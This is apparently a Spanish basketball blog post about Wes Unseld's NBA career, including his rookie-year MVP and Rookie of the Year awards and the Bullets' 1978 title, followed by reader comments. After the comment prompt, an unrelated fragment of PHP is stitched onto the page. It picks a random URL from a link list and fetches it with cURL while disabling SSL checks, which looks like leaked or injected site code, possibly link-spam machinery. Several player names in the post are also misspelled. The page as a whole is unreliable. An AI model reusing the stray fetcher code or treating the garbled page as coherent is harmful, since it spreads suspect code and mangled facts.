¿Quién fue Wes Unseld?

19 de January de 2009 por txusma

Esperando que se inicie un partido en mi humilde NBA2k9 para PS2 aparece una de esas preguntas de trivial que nos entretienen antes de que el balón eche a rodar: “Sólo 2 jugadores han ganado el MVP y el ROY el mismo año. Uno fue Wilt Chamberlein pero, ¿y el otro?”. En la pantalla 4 nombres (Larry Bird, Tim Duncan, Magic Johnson, Wes Unseld) de los cuales uno no me suena de nada así que tras dudarlo mucho y sin tenerlo nada claro marco el nombre de Larry Bird (por decir uno). 3 segundos después el nombre de Wes Unseld es resaltado y considerado la respuesta correcta. ¿Pero quién es este hombre?

Wes Unseld (nacido en Louisville, Kentucky, en 1946) llegó a la NBA en 1968 tras ser escogido en segunda posición del draft por los Baltimore Bullets tan sólo detrás de otro de los 50 mejores jugadores de la historia, Elvin Hayes. Desde su creación en 1961, la franquicia jamás había conseguido finalizar la temporada con un balance de victorias positivo. Pero la llegada de Unseld suposo un auténtico punto de inflexión: En su primera temporada compartió equipo con el ROY del año anterior, Earl “The Pearl” Monroe, y juntos iniciaron una serie de 10 temporadas de balance positivo y 12 apariciones de Playoffs.

El impacto de este pívot de apenas 2 metros de altura fue tremendo desde el primer momento. Su equipo acabó con 57 victorias y 25 derrotas y en primera posición de la Conferencia Este. Individualmente, promedió 13.8 puntos y 18.2 rebotes durante la temporada, disputó el All-Star, y puso el broche de oro con el título de ROY y MVP. En aquellos Playoffs, con Unseld promediando 18 puntos y 18 rebotes y Earl Monroe 28 puntos, los Bullets fueron eliminados en semifinales de Conferencia por los Knicks de Willis Redd y Walter Frazier.

Wes Unseld parecía estar forjado de granito y su gran determinación y resolución en pos la victoria le hicieron salir victorioso en mucho de los legendarios duelos que protagonizó contra pívots mucho más altos que él, como por ejemplo Kareem Abdul-Jabbar, de 2 metros y 13 centímetros. Sus grandes dotes de reboteador y su gran inteligencia le permitieron liderar la clasificación de los reboteadores en 1975 y convertirse en el sexto mejor reboteador de la historia de la NBA con una media de 14 rebotes por partido.

En la temporada 70-71 los Bullets consiguieron llegar a su primera final pero cayeron 4-0 frente a unos Bucks donde sobresalían unos tales Oscar Robertson y Kareem Abdul-Jabbar. No sería hasta el año 1975, y compartiendo la pintura con Elvin Hayes, que Unseld no volvería a disputar y perder unas finales. El año anterior el equipo se había trasladado de Baltimore a Washington y la franquicia había pasado a denominarse Washington Bullets (durante un año se le conoció como Capital Bullets). Aquel año perdieron la final con los Golden State Warriors.

Los años pasaban y aunque la fuerza de Unseld disminuía su importancia en el equipo y su mejora en otras facetas del juego crecía. De hecho en la temporada 75-76 promedió 13.3 rebotes, pero tambien repartió 5.2 asistencias y anotó con un acierto del 56 por ciento, lo que valió para liderar la liga.

Fue en 1978 que los Bullets, de la mano de unos Wes Unseld y Elvin Hayes que ya superaban la treintena, consiguieron su primer y único campeonato de la NBA en lo que fue un auténtico triunfo del juego de equipo. La temporada regular de Washington no hacía presagiar la gloria posterior pero en Playoffs consiguieron eliminar sucesivamente a Atlanta Hawks, San Antonio Spurs y Philadelphia 76ers y se plantaron contra todo pronóstico en una final que les enfrentaría a los Seattle Supersonics de unos jóvenes Dennis Johnson y Jake Sikma. Tras una serie agónica, los Bullets se alzaron con el triunfo en el séptimo partido y Unseld fue nombrado mejor jugadores de las finales.

Antes de retirarse en 1981 por culpa de sus rodillas aún le daría tiempo de perder otra final, casualmente contra unos Seattle Supersonics que se tomaron cumplida venganza de su derrota en 1978.

Tras su retirada, Wes Unseld entró a formar parte de la directiva de los Bullets y llegó a convertirse en entrenador en una época donde no pudo repetir los logros que consiguió como jugador. En 1996 fue nombrado GM, guiando a la franquicia a los Playoffs en tan solo una ocasión en los 7 años que duró su mandato.

Comenta

6 comentarios a esta entrada

  1. Vader dice:
    #1

    muy chulo el articulo. yo tambien tengo el nba 2k9 y se sale XD

    saludos

      Citar

  2. MagicJohnson32 dice:
    #2

    ¿Se sale el juego o Unseld? 😉

      Citar

  3. Viva_Dirk dice:
    #3

    Txus, ya preguntaste por el cuando a Kevin Love lo comparaban con el, y ni después de eso te informaste, eres un piltrafilla.

      Citar

  4. Txusma dice:
    #4

    Vaya memoria! Ni yo lo recuerdo…
    Seguro q en su momento nadie me dijo q habia ganado el MVP y el ROY el mismo año!

      Citar

  5. matraco dice:
    #5

    No recordaba a ese jugador. Enhorabuena por el post….y por el blog

      Citar

  6. MagicJohnson32 dice:
    #6

    Gracias Matraco, y bienvenido seas. Espero que no sea tu último comentario aquí.

    Un saludo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>